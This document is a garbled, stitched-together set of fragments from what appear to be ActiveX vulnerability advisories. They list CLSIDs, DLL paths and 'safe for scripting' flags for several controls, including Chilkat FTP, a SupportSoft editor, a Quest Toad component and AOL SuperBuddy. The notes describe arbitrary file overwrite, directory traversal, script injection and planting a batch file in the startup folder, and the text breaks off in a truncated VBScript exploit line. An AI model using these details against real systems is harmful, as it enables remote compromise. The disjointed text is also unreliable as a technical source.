ActiveX Settings:
CLSID: {302124C4-30A0-484A-9C7A-B51D5BA5306B}
Progid: ChilkatFtp2.ChilkatFtp2.1
Binary Path: C:\Windows\System32\CHILKA~2.DLL
KillBitted: False
Implements IObjectSafety: True
Safe For Initialization (IObjectSafety): True
Safe For Scripting (IObjectSafety): True
This class allows to copy/overwrite files inside arbitrary locations ex. by the GetFile()
method. This code creates a batch file inside the automatic startup folder,
details:
CLSID: {01110800-3E00-11D2-8470-0060089874ED}
Progid: Tioga.Editor.1
Binary Path: C:\Programmi\File comuni\SupportSoft\bin\dnaedit.dll
KillBitted: False
Implements IObjectSafety: True
Safe For Initialization (IObjectSafety): True
Safe For Scripting (IObjectSafety): True
vulnerabilities, discovered two months ago:
insecure methods: Packagefiles() - remote file overwrite, directory traversal, *script injection* and ... a crash (investigating on this one)
file tested: Quest_Toad-Development-Suite-for-Oracle_110R2.exe
CLSID: {F7014877-6F5A-4019-A3B2-74077F2AE126}
Progid: QExplain2.ExplainPlanDisplayX
Binary Path: C:\PROGRA~1\COMMON~1\QUESTS~1\QEXPLA~1.DLL
Implements IObjectSafety: True
Safe For Initialization (IObjectSafety): True
Safe For Scripting (IObjectSafety): True
rgod
-->
by a "//" sequence
CLSID: {189504B8-50D1-4AA8-B4D6-95C8F58A6414}
Progid: Sb.SuperBuddy.1
Binary Path: C:\Programmi\AOL 9.1\sb.dll
Implements IObjectSafety: True
Safe For Initialization (IObjectSafety): True
Safe For Scripting (IObjectSafety): True
-->
<script language='vbscript'>
Set obj = CreateObject("Sb.SuperBuddy.1")
